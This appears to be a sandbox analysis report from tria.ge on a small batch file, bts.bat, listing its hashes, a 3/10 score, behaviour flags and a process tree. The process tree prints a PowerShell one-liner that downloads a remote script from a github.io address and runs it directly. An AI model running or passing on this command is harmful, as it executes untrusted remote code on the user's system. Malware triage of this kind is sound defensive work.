Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    12s
  • max time network
    19s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    08/09/2024, 12:02

General

  • Target

    Files/Apps/bts.bat

  • Size

    227B

  • MD5

    0cfdb01d34041f9e16ddd9f17e3f4789

  • SHA1

    393afcbc7fb973b5c2893b8085092f0c2c45311e

  • SHA256

    528ed4942a647ee78a31aaa788ef27b7fe747fcf9fc0e97192ad9a0aaf97c0c2

  • SHA512

    19e96f69fe9b335941b2ae107ca5eeb366825a399428df4af86faabc9f858e09b5bdb4080cff0db89c3a49dd26b77aa25b0e857572a4c39afddc112b113adcd0

Score
3/10

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\Files\Apps\bts.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:792
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c chcp
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2204
      • C:\Windows\system32\chcp.com
        chcp
        3⤵
          PID:2236
      • C:\Windows\system32\chcp.com
        chcp 65001
        2⤵
          PID:1888
        • C:\Windows\system32\chcp.com
          chcp 437
          2⤵
            PID:2504
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -Command "irm https://schooicodes.github.io/file_hosting/bts.ps1 | iex"
            2⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1680

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • memory/1680-4-0x000007FEF4F1E000-0x000007FEF4F1F000-memory.dmp

          Filesize

          4KB

        • memory/1680-5-0x000000001B180000-0x000000001B462000-memory.dmp

          Filesize

          2.9MB

        • memory/1680-6-0x00000000025F0000-0x00000000025F8000-memory.dmp

          Filesize

          32KB

        • memory/1680-7-0x000007FEF4C60000-0x000007FEF55FD000-memory.dmp

          Filesize

          9.6MB

        • memory/1680-8-0x000007FEF4C60000-0x000007FEF55FD000-memory.dmp

          Filesize

          9.6MB

        • memory/1680-9-0x000007FEF4C60000-0x000007FEF55FD000-memory.dmp

          Filesize

          9.6MB

        • memory/1680-11-0x000007FEF4C60000-0x000007FEF55FD000-memory.dmp

          Filesize

          9.6MB

        • memory/1680-10-0x000000000288B000-0x00000000028F2000-memory.dmp

          Filesize

          412KB

        • memory/1680-12-0x000007FEF4C60000-0x000007FEF55FD000-memory.dmp

          Filesize

          9.6MB